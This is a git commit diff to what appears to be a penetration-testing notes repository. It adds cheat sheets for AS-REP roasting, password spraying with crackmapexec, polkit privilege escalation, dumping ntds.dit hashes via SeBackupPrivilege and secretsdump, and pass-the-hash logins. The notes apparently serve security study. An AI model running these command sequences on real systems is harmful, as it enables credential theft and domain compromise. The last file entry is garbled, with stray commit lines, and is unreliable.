added rsync enum alternative path

2022-01-09 22:52:39 +01:00 · 2022-01-09 22:52:39 +01:00 · 4a016c96bd
parent b45e18400a
commit 4a016c96bd
13 changed files with 109 additions and 4 deletions
--- a/.gitmodules
+++ b/.gitmodules
@ -100,3 +100,6 @@
 [submodule "reverse_engineering/java/deobfuscator"]
 	path = reverse_engineering/java/deobfuscator
 	url = https://github.com/java-deobfuscator/deobfuscator.git
 [submodule "exploit/windows/CrackMapExec"]
 	path = exploit/windows/CrackMapExec
 	url = https://github.com/byt3bl33d3r/CrackMapExec.git
--- a/enumeration/docs/kerberoast.md
+++ b/enumeration/docs/kerberoast.md
@ -0,0 +1,20 @@
 # Kerberoast
 ## Usage
 * Impacket's `GetNPUsers.py` to get Hashes of userlist
 ```sh
 GetNPUsers.py -no-pass <DomainName>/  -usersfile users.txt -format john -outputfile hashes
 ```
 * Use crackmapexec to gain access to further user accounts with the password of the user found with `GetNPUsers.py`
 ```sh
 crackmapexec smb $TARGET_IP -u users.txt -p pass.txt
 ```
    * Watch out for `STATUS_PASSWORD_MUST_CHANGE`
    * Change password with 
 ```sh
 smbpasswd.py <user>@$TARGET_IP  -newpass password123
 ```
--- a/enumeration/docs/rsync.md
+++ b/enumeration/docs/rsync.md
@ -1,6 +1,7 @@
 # rsync
-[netspi article]( https://www.netspi.com/blog/technical/network-penetration-testing/linux-hacking-case-studies-part-1-rsync/)
+* [netspi article]( https://www.netspi.com/blog/technical/network-penetration-testing/linux-hacking-case-studies-part-1-rsync/)
 * [hacktricks' rsync](https://book.hacktricks.xyz/pentesting/873-pentesting-rsync)
 ## Enumerate
@ -9,6 +10,19 @@ rsync <target-IP>::
 rsync <target-IP>::files
 rsync <target-IP>::files/foo/
 ```
 ### via netcat
 * Another way is the following
 ```sh
 nc -vn $TARGET_IP 873
 ```
 * Repeat the identical handshake, e.g.
 ```
@RSYNCD: 31.0
 ```
 * List all directories
 ```sh
 #list
 ```
 ## Downloads
--- a/exploit/linux/polkit.md
+++ b/exploit/linux/polkit.md
@ -22,3 +22,19 @@ dbus-send --system --dest=org.freedesktop.Accounts --type=method_call --print-re
 * `su user1` and `sudo -s`
 # Priv Esc with Two Sessions
 * User has to be member of group `sudo`
 * Open two ssh sessions
 * In session one check the PID
 ```sh
 echo $$
 ```
 * In the other session
 ```sh
 pkttyagent --process <PID of s1>
 ```
 * In session one do
 ```sh
 pkexec "/bin/bash"
 ``` 
 * Enter password in session two
--- a/exploit/web/ssti/tplmap
+++ b/exploit/web/ssti/tplmap
@ -1 +1 @@
-Subproject commit 1d6315650b2177d25e5f8513b35dd80006996d98
+Subproject commit 6f2150134dc637ff80478f623f28bb548ea2ca15
--- a/exploit/windows/CrackMapExec
+++ b/exploit/windows/CrackMapExec
@ -0,0 +1 @@
 Subproject commit a8df4c2a868378576f3b959261ad756e06ed3749
--- a/exploit/windows/docs/impacket.md
+++ b/exploit/windows/docs/impacket.md
@ -2,3 +2,13 @@
 * [Repo](https://github.com/SecureAuthCorp/impacket)
 ## Secretsdump
 * `ntds.dit` and `system.hive` are needed
 ```sh
 secretsdump.py -system system.hive -ntds ntds.dit -hashes lmhash:nthash LOCAL -outputfile hashes.txt
 ````
 * Remove everything but the hashes
 * Use it to log in on the target
 ```sh
 crackmapexec smb $TARGET_IP -u <user> -H hashes.txt
 ```
--- a/exploit/windows/impacket
+++ b/exploit/windows/impacket
@ -1 +1 @@
-Subproject commit 6da655ca9ac4f9c2a207ea47e79d089044accd78
+Subproject commit 10e53952e64e290712d49e263420b70b681bbc73
--- a/hashes/password_cracking/hydra.md
+++ b/hashes/password_cracking/hydra.md
--- a/post_exploitation/docs/windows/pass_the_hash.md
+++ b/post_exploitation/docs/windows/pass_the_hash.md
@ -0,0 +1,12 @@
 # Pass the Hash
 ## Usage
 ```sh
 GetUserSPNs.py <Domain>/<user> -hashes <ntlm:hash> -outputfile hash.txt
 ```
 * Crack the password
 * login
 ```sh 
 evilwinrm -i $TARGET_IP -u <user> -p password
 ```
--- a/post_exploitation/docs/windows/sebackupprivilege.md
+++ b/post_exploitation/docs/windows/sebackupprivilege.md
@ -0,0 +1,29 @@
 # SEBackupPrivilege Escalation
 * Check user privileges to escalate
 ## Usage
 * Check `whoami /all`
 * `SeBackupPrivilege` must be present
 * [Payloads all the things](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Active%20Directory%20Attack.md#using-diskshadow-a-windows-signed-binary)
 * Upload `diskshadow.txt` to the target with the following content
 ```sh
 set metadata C:\tmp\tmp.cabs 
 set context persistent nowriters 
 add volume c: alias someAlias 
 create 
 expose %someAlias% h:
 ```
 * Change dir to `C:\Windows\System32` and `diskshadow.exe /s C:\Path\to\diskshadow.txt`
 * Upload these [dlls](https://github.com/giuliano108/SeBackupPrivilege) to the target
 ```sh
 import-module .\SeBackupPrivilegeUtils.dll
 import-module .\SeBackupPrivilegeCmdLets.dll
 copy-filesebackupprivilege h:\windows\ntds\ntds.dit C:\tmp\ntds.dit -overwrite
 reg save HKLM\SYSTEM C:\Path\to\uploads\system
 ```
 * Downloads the files `ntds.dit` and `system`
 * Extract the hashes via
 ```sh
 secretsdump.py -system system -ntds ntds.dit LOCAL > out.txt
 ```
--- a/post_exploitation/priv_esc/privesc-scripts/privilege-escalation-awesome-scripts-suite
+++ b/post_exploitation/priv_esc/privesc-scripts/privilege-escalation-awesome-scripts-suite
@ -1 +1 @@
-Subproject commit a17f91745cafc5fa43a428d766294190c0ff70a1
+Subproject commit 8c67152e1761fb9b403918a7fa174126f36f61db
--- a/stego/xor_key_file.py
+++ b/stego/xor_key_file.py
		`@ -1 +1 @@`
			`Subproject commit 1d6315650b2177d25e5f8513b35dd80006996d98`				`Subproject commit 6f2150134dc637ff80478f623f28bb548ea2ca15`
		`@ -0,0 +1 @@`
							`Subproject commit a8df4c2a868378576f3b959261ad756e06ed3749`
		`@ -1 +1 @@`
			`Subproject commit 6da655ca9ac4f9c2a207ea47e79d089044accd78`				`Subproject commit 10e53952e64e290712d49e263420b70b681bbc73`
		`@ -1 +1 @@`
			`Subproject commit a17f91745cafc5fa43a428d766294190c0ff70a1`				`Subproject commit 8c67152e1761fb9b403918a7fa174126f36f61db`